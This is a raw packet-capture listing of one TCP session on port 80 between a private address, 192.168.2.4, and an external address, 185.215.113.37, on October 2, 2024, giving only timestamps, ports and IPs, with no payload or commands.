Oct 2, 2024 18:19:27.970732927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970755100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970762968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971196890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971205950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971215010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971224070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971227884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971231937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971240044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971240997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971250057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971263885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971265078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971276045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971292973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971472025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971481085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971489906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971507072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971507072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971515894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971549034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971618891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971627951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971632957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971641064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971645117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971652985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971661091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971662998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971669912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971677065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971679926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971688986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971690893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971698046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971707106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971707106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971716881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.971725941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971741915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971741915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.971755028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972358942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972374916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972383976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972393990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972397089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972403049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972412109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972419024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972421885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972430944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972440958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972440958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972450972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972460032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972462893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972467899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972474098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972476006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972484112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972491026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972493887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972506046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972511053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972532988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972543001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972889900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972899914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.972933054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.972958088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973125935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973135948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973145008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973154068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973161936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973164082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973174095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973177910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973184109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973191977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973193884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973201990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973211050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973215103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973221064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973227978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973229885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973242044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973249912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973251104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973259926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973280907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973566055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973577023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973611116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973620892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973731041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973741055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973750114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973759890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973764896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973769903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973776102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973778963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973788977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973795891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973799944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973809958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973814011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973820925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973826885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973831892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973840952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.973841906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973859072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.973877907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074147940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074166059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074188948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074202061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074203968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074212074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074219942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074228048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074234962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074250937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074253082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074259996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074278116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074295044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074537992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074553013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074568033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074583054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074583054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074593067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074599028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074614048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074629068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074639082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074644089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074639082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074639082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074666023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074666977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074666977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074688911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074702978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074902058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074924946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074939966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074939966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074954033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074964046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074968100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074980021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.074982882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.074996948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075009108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075009108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075011015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075026035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075027943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075040102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075042009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075054884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075062990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075069904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075078011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075083971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075093031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075099945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075109005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075119019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075124979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075139046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075155020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075572968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075587988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075602055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075609922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075618029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075625896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075639963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.075783014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075783968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.075783968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076019049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076034069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076056957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076064110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076071978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076083899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076087952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076102972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076111078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076111078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076118946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076133013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076138973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076138973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076148987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076163054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076164961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076179981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076188087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076188087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076195955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076209068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076210022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076225042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076236963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076236963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076240063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076252937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076263905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076263905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076267004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076282024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076289892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076289892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076297045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076307058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076313019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.076322079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076358080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076365948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.076978922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077002048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077016115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077025890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077030897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077040911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077045918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077054024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077060938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077065945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077075958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077084064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077091932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077096939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077105999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077115059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077120066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077126026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077141047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077143908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077161074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077168941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077174902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077179909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077189922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077197075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077203989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077210903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077218056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077227116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077233076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077248096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077250004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077264071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077270985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077280045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077306032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077327013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077944994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077960968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077982903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.077987909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.077999115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078008890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078012943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078027010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078027010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078041077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078042030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078057051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078068018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078071117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078084946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078092098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078099966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078109980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078114033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078128099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078136921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078141928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078161001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078183889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078238964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078253984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078270912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078274965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078285933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078294992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078301907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078329086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078345060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078356981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078356981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078356981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078356981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078378916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078619003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078634977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078650951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078656912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078665972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078674078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078685999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078699112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078700066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078722954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078737974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078739882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078766108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078767061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078783035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078788042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078797102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078804970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078811884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078823090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078828096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078836918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078843117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078849077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078857899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:28.078865051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:28.078879118 CEST	49737	80	192.168.2.4	185.215.113.37
